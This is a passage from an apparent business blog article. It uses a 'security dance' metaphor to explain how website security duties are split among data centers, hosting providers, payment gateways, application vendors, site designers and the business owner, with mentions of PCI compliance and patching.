  • The vendors of the applications installed by the above parties.
  • The payment gateway(s) used by the above parties.
  • The hosting provider.
  • The data center(s) used by the hosting provider (if they don’t own their own; most do not).

Each dance partner plays a specific part in the dance; and, if the dance partner is not watching what they are doing, it will hurt more than having your foot stepped on, or falling off the ledge into a pool (like in It’s a Wonderful Life).

Now, let’s go over the responsibilities of each party in the security dance.

The data center should maintain SSAE 16 certification showing the data center management cares about quality assurance, processes, and procedures for maintaining quality.

The hosting provider should themselves have and maintain PCI Compliance. The hosting provider should also have each server secured (hardened against hackers) along with plans, policies, and procedures that keep the security up to date. The hosting provider should have plans, policies, and procedures in place to review server log files and reports throughout the day; and take appropriate action as necessary based on the daily review of those reports.

The payment gateway provider should have and maintain PCI Compliance, and have a history of taking security seriously including full disclosure of any past security breaches; and if there were any breaches, a written statement of what was done to prevent breaches of a similar nature from occurring in the future.

The application (content management systems like WordPress, Drupal, Joomla along with shopping carts etc) vendor is responsible for providing the business management team and their designer (in-house or external) with access to up to date software. They are responsible for writing secure code, and taking reports of vulnerable code seriously. Any vulnerability reports should be promptly handled by the application vendor development team providing patches and updates to their application in a timely manner.

The web site designer and their team (in-house or external) are responsible for applying application vendor provided updates and patches in a timely manner. This team should also be reviewing the site logs to see who is visiting the site, and how the site is being used.

The business steward — the buck stops here! — has the responsibility to check that each dance partner is doing their job.

In my next article, I plan to cover steps you can take as a business steward to make your life easier in being a part of this security dance; and in making sure your dance partners are dancing to the same tune for your benefit.

Please contact us if you have any questions.
